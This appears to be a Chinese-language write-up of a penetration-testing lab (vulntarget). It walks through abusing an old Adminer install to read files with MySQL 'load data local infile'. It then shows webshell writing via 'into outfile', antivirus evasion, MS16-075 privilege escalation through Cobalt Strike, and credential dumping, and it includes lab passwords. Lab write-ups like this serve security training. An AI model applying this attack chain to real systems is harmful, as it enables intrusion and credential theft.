github地址：

https://github.com/crow821/vulntarget

No1

1.1 信息收集

靶机80端口访问过去后显示IIS7环境界面没有任何敏感信息

拿到靶机IP地址后做个端口扫描，发现8000端口开放存在http服务访问过去是个米拓建站系统，扫了一下当前目录发现存在adminer且版本比较低，网上找了一下文章尝试复现任意文件读取漏洞

1.2 文件读取

本机mysql开启外链：

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;

创建用来接收文件内容的库和表：

create database adminer; create table test(text text(4096));

一开始使用绝对路径米拓cms配置文件总是报错，猜想可能更改了web默认目录尝试其他办法

浏览器访问adminer插件识别到了apache版本号，尝试利用相对路径读取vhosts文件

在phpstudy环境下vhosts文件的目录格式为"../../Extensions/中间件及版本号/conf/vhosts/0localhost_端口号.conf，拼接后的命令为：

load data local infile "../../Extensions/Apache2.4.39/conf/vhosts/0localhost_8000.conf" into table tr FIELDS TERMINATED BY '\n';

绝对路径拿到后尝试读取米拓cms数据库配置文件，命令：

load data local infile "C:\\php\\adsdrsdfv\\config\\config_db.php" into table test FIELDS TERMINATED BY '\n';

拿到数据库了后尝试getshell，一开始想的是日志getshell

但等等我尝试连接shell发现不行可能web目录不可写，想起来前面的80端口上开着iis服务尝试跨中间件写shell

1.3 跨中间件

首先了解一下Iis站点配置文件存放路径：

C:\\Windows\\System32\\inetsrv\\config\\applicationHost.config

登陆靶机adminer查看secure_file_priv参数信息

参数为空可读可写，前面用的函数为load data local infile这里在读取文件的时候会报类型不一致错，猜测iis目录为中文路径换load_file函数尝试读取

命令：

select load_file('C:/Windows/System32/inetsrv/config/applicationHost.config')

其中physicaIPath参数指向的是iis文件路径，尝试into outfile写马的时候遇到中文编码问题

1.4 中文路径

命令：select '123' into outfile 'C:/vulnIIS/俱乐部/1.txt';

这里由于浏览器为utf-8没法处理中文，使用插件将编码改为gbk即可

或者将mysql数据库字符集编码为gbk应该也可以，但我尝试指定数据库字符集却报错，命令：

select '123' into outfile 'C:/vulnIIS/俱乐部/1.txt';

尝试访问

传了常规一句话连不上可能有杀软，直接写入冰蝎原生shell成功连接

1.5 内网渗透

先看一下IP信息存在双网卡做一下落地机信息收集systeminfo信息显示存在安全狗杀软，做个简单免杀传上去准备上线，顺便做了一下辅助提权发现ms16-075可用于后续提权：

上线CS后使用插件内的ms16-075攻击载荷提升至system权限，本想net user一下当前用户，结果给拦截了做了一下argue 进程参数欺骗就可以看到当前存在三个用户

尝试抓取用户明文密码

获取到的密码凭据有：admininstrator/Qwe123asd vulntarget/123.com

查看普通用户桌面的时候发现安装的有搜狗浏览器，CS利用插件获取浏览器缓存只读到了用户名密码读取失败可能是安全策略起作用了，尝试3389连上去查看